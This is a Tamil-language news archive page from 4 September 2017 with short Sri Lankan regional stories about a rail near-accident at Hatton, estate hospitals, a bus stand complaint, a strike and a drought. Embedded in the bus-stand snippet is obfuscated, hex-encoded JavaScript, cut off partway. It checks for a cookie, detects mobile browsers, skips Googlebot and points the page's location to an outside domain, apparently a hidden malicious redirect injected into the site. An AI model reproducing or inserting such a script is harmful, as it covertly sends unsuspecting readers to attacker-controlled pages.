முகப்புஎம்மை பற்றிவிளம்பரம்செய்திகள்தொடர்பு

Day

September 4, 2017

அட்டன் சிங்கமலை சுரங்க ரயில் பாதையில் இடம்பெறவிருந்த பாரிய விபத்து தவிர்ப்பு!

கொழும்பு கோட்டையிலிருந்து பதுளை நோக்கி சென்ற ரயில் அட்டன் பகுதியில் ஏற்படவிருந்த பாரிய விபத்தொன்று ரயில் பாதை ஊழியர் ஒருவரின் விரைந்து செயற்பட்டமையினால் தவிர்க்கப்பட்டுள்ளதுடன் பதுளை ரயில் சேவை 1 மணித்தியாலத்தின் பின் மீண்டும் சேவையை ஆரம்பித்ததாக அட்டன் ரயில் நிலையபொறுப்பதிகாரி தெரிவித்துள்ளார். அட்டன் சிங்கமலை சுரங்க பாதைக்குள் ரயில் தண்டவாளத்தில் காணப்பட்ட வெடிப்பை கண்டு அட்டன் ரயில் நிலையத்திற்கு தொடர்பை உடனடியாக ஏற்படுத்த முடியாத நிலையில் விரைந்து செயற்பட்ட குறித்த ஊழியர் சிங்க மலை சுரங்கத்தினுள்ளிருந்து...
Read More

3000 மில்லியன் ரூபா செலவில் பெருந்தோட்ட வைத்தியசாலைகளை அபிவிருத்தி செய்ய நடவடிக்கை – அமைச்சர வே.இராதாகிருஸ்ணன்!

மலையக பெருந்தோட்டங்களில் காணப்படும் வைத்தியசாலைகளை 3000 மில்லியன் ரூபா செலவில் அபிவிருத்தி செய்யவுள்ளதாக கல்வி இராஜாங்க அமைச்சரும் மலையக மக்கள் முன்னனியின் தலைவரும் தமிழ் முற்போக்கு கூட்டணியின் பிரதி தலைவருமான வே.இராதாகிருஸ்ணன் அவர்கள் தெரிவிக்கின்றார். கொத்மலை லபுக்கலை தோட்டம் மேற் பிரிவில் கலாச்சரா மண்டபம் பாதை திறப்பு விழாவிற்கு பிரதம அதிதியாக கலந்துக் கொண்டு அங்கு உரையாற்றும் போதே இவ்வாறு தெரிவித்தார். தொடந்து இந்த விடயம் தொடர்பில் கருத்து தெரிவிக்கையில் மலையகத்தில் காணப்படும் பெரும்பாலான வைத்தியசாலைகள் பாதிப்படைந்து...
Read More

அக்கரப்பத்தனை பஸ் நிலையத்தில் அசௌகரியம் – பொதுமக்கள் விசனம்!

அக்கரபத்தனை பஸ்தரிப்பிடத்தில் முச்சக்கரவண்டிகளும் மோட்டார் சைக்கிள்களும் நிறுத்துவதனால் பல்வேறு அசௌகரியங்களுக்கு உள்ளாவதாக பொது மக்கள் விசனம் தெரிவிக்கின்றனர். பஸ்தரிப்பிட பகுதியில் இவ்வாறு வாகனங்களை நிறுத்துவதனால் பயணிகள் போக்குவரத்து பஸ் தரித்து நிறுத்தமுடியாதுள்ளதால் பயணிகள் பெரிதும் பதிப்படைவதாக தெரிவிக்கின்றனர். சம்பவம் தொடர்பில் பஸ்தரிப்பிட நேர கண்காணிப்பாளர்கள் அக்கரப்பத்தனை பொலிஸ் நிலையத்தில் முறைபாடு செய்யப்பட்டுள்ள போதிலும் பொலிஸாரினால் எவ்வித நடவடிக்கையும் எடுக்கவில்லையென தெரிவிக்கின்றனர். நோட்டன் பிரிட்ஜ் நிருபர் மு.இராமச்சந்திரன்var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a...
Read More

நானு ஓயாவில் பால் பவுசர் விபத்து -சாரதி தெய்வாதீனமாக உயிர் தப்பினார்!

அட்டன் நுவரெலியா பிரதான வீதீயின் நானுஓயா பகுதியில் பாரவூர்த்தியொன்று பாதையை விட்டு விலகி விபத்துக்குள்ளாகியுள்ளது. அம்பேவலயிலிருந்து அட்டன் நோக்கிவந்த பால் கொண்டுசெல்லும் பாரவூர்தியே நானுஓயா ரதல்ல குருக்கு பாதையில் 04.09.20 17. மதியம் 12 மணியளவில் விபத்துக்குள்ளானதாக பொலிஸார் தெரிவித்தனர். பாரவூர்தியில் ஏற்பட்ட திடீர் கோளாரினாலே விபத்து ஏற்பட்டுள்ளதுடன் சீரற்ற காலநிலையினாலே சாரதியின் கட்டுப்பாட்டை மீறி பாதையை விட்டு விலகி வித்துக்குள்ளானதாகவும் தெய்வாதீனமாக சாரதிக்கு எவ்வித பாதிப்புகளும் இல்லை என நானுஓயா பொலிஸார் தெரிவித்தனர். நோட்டன் பிரிட்ஜ்...
Read More

சுகாதார பரிசோதகர்கள் பணி பகிஸ்கரிப்பு – மலையகத்தில் சகல இறைச்சி விற்பனை நிலையங்களும் மூடல்!

சுகாதார பரிசோதகர்கள் பணிபகிஸ்கரிப்பில் ஈடுபட்டுள்ளமையினால் மலையத்திலுள்ள சகல இறைச்சி விற்பனை நிலையங்களும் முடப்பட்டுள்ளதுடன் சுகாதார பரிசோதகர்களின் சகல நடவடிக்கைகளும் ஸ்தம்பிதம் அடைந்துள்ளது. யாழ் நகர சபையின் கடமையாற்றிய சுகாதார பரிசோதகர்கள் 3 பேரை வடமாகாண சுகாதார அமைச்சினால் அரசியல் ரீதியில் இடமாற்றம் செய்யப்படாமைக்கு எதிர்ப்பு தெரிவிக்கும் வகையில் 04.09.2017 காலை முதல் நாடளாவிய ரீதியில் சுகாதார பரிசோதகர்கள் பணி பகிஸ்கரிப்பில் ஈடுபட்டுள்ளனர். இப்பணிபகிஸ்கரிப்புக்கு ஆதரவு தெரிவிக்கும் வகையில் மலையகத்தின் சகல சுகாதார பரிசோதகர்களும் பணி பகிஸ்கரிப்பில் ஈடுபட்டு...
Read More

களனிவெளி தேயிலை தோட்ட தொழிலாளர்கள் 550 பேருக்கு பதக்கம் அணிவித்து கௌரவிப்பு!

பெருந்தோட்ட தேயிலை தொழில்துறையை மேம்டுத்தும் வகையில் களனி வெளி கம்பனியில்சிறப்பாக சேவையாற்றிய தொழிலாளர்களை கௌரவிக்கும் நிகழ்வு அட்டன் பிரின்ஸ் மண்டபத்தில் 04.09.2017 நடைபெற்றது. களனிவெளி பெருந்தோட கம்பனியின் கீழ் இயங்கும் பெருந்தோட்டங்களை சேர்ந்த 550 தொழிலாளர்களுக்கு பதக்கங்கள் அணிவிக்கப்பட்டு சான்றிதழ் வழங்கி கௌரவிக்கப்பட்டனர். நீண்டகாலம் சிறப்பாக சேவையாற்றிய 14 தோட்டங்களை சேர்ந்த 450 பேருக்கு பதக்கம் அணிவிக்கப்பட்டதுடன் சிறப்பாக சேவையாற்றிய 100 பேருக்குமாக 550 பேர் கௌரவிக்கப்பட்டனர். களனிவெளி பெருந்தோட்ட கம்னியின் பிரதம நிறைவேற்று அதிகாரி சரத்ஸ்ரீமான...
Read More

பஸ் நடத்­து­னர்கள் மிகுதிப் பணம் வழங்­கா­வில்லையா ? உடன் அழையுங்கள்!

மேல் மாகாணத்திற்குட்பட்ட வீதிகளில் சேவையில் ஈடுபடும் தனியார் பஸ்களில், பயணிகளுக்கு தொல்லை தரும் விதத்திலான நிகழ்வுகள் இடம்பெற்றால், இது தொடர்பில் உடனடியாக பயணிகள் முறைப்பாடு செய்ய முடியும் என்று மேல் மாகாண பயணிகள் போக்குவரத்து அதிகார சபை அறிவித்துள்ளது. தனியார் பஸ்கள் தொடர்பில் பயணிகளிடமிருந்து அடிக்கடி முறைப்பாடுகள் கிடைத்தவண்ணமிருப்பதால், இது விடயத்தில் கூடிய கவனம் எடுத்து, பயணகளுக்கு மிகச் சிறந்த போக்குவரத்துச் சேவைகளை ஏற்படுத்திக் கொடுக்கும் நோக்கிலேயே இந்த நடவடிக்கை எடுக்கப்பட்டிருப்பதாக மேல் மாகாண பயணிகள் போக்குவரத்து...
Read More

இலங்கையர்களே எச்சரிக்கை! உங்களை நோக்கி வரும் புளூவேல் கேம்?

இணையதளங்களில் புளுவேல் சேலஞ்ச் என்ற பெயரில் ஆன்லைன் விளையாட்டு உள்ளது. 50 நாட்கள் தொடர்ந்து விளையாட வேண்டும் என்பது விதி. இதற்கிடையில் இந்த கேம்மை விளையாடியவர்கள் இதுவரை சுமார் 100-க்கும் மேற்பட்டோர் உயிரிழந்துள்ளனர். ஏனெனில், இந்த விளையாட்டில் கடுமையான சவால்கள் 50 நாட்கள் வழங்கப்படும். உதாரணமாக ‘உன் கையில் பிளேடு வைத்து 3 முறை கிழி, அதை போட்டோ எடுத்து அனுப்பு. அதிகாலை எழுந்து பேய் படம் பார், அதை செல்பி எடுத்து எனக்கு அனுப்பு. ரயில்வே...
Read More

கண்டி மாவட்டத்தில் வரட்சியால் 5,861 பேர் பாதிப்பு!!

கண்டி மாவட்டத்தில் கடந்த மூன்று மாதங்களாக நிலவி வரும் கடும் வரட்சி காரணமாக, நான்கு பிரதேச செயலார் பிரிவுகளில், 1,696 குடும்பங்களை சேர்ந்த 5,861 பேர் பாதிக்கப்பட்டுள்ளதாக, அனர்த்த முகாமத்துவ நிலையம் தெரிவித்துள்ளது. இதற்கமைவாக, பாதத்தும்பறை பிரதேச செயலகப் பிரிவில் 835 குடும்பங்களை சேர்ந்த 2,745பேரும், மெதத்தும்பறை பிரதேச செயலகப் பிரிவில் 720 குடும்பங்களை சேர்ந்த 2,574 பேரும், அக்குறணை பிரதேச செயலகப் பிரிவில் 115 குடும்பங்களை சேர்ந்த 450 பேரும் உடதும்பறை பிரதேச செயலகப் பிரிவில்...
Read More

மலையகத்தை அபிவிருத்தி செய்வது அரசியல் தலைமைகளின் கடமை என்கிறார் ராஜாராம்!

மலையகத் தோட்டப் புறங்களின் அபிவிருத்திக்கு, மலையகத் தலைமைகள் ஒவ்வொருவரும், ஏதோ ஒரு வகையில் சேவை செய்துள்ளார்கள் என்று, மத்திய மாகாணசபை உறுப்பினர் ஆர். ராஜாராம் கூறியுள்ளார். கொத்மலை, வெவன்டன் தோட்டத்துக்கும் கோதை கிராமத்துக்குமாக நிர்மாணிக்கப்பட்ட உறவுப் பாலத்தை திறந்துவைத்து உரையாற்றும் போதே, அவர் மேற்கண்டவாறு தெரிவித்தார். குறித்த பாலம், கல்வி இராஜாங்க அமைச்சரும் மலையக மக்கள் முன்னணியின் தலைவரும், தமிழ் முற்போக்குக் கூட்டணியின் பிரதித் தவைவருமான வீ. இராதாகிருஸ்ணனின் நிதியொதுக்கீட்டின் கீழ் நிர்மாணிக்கப்பட்டுள்ளமை குறிப்பிடத்தக்கது. அவர் மேலும்...
Read More
error: Content is protected !!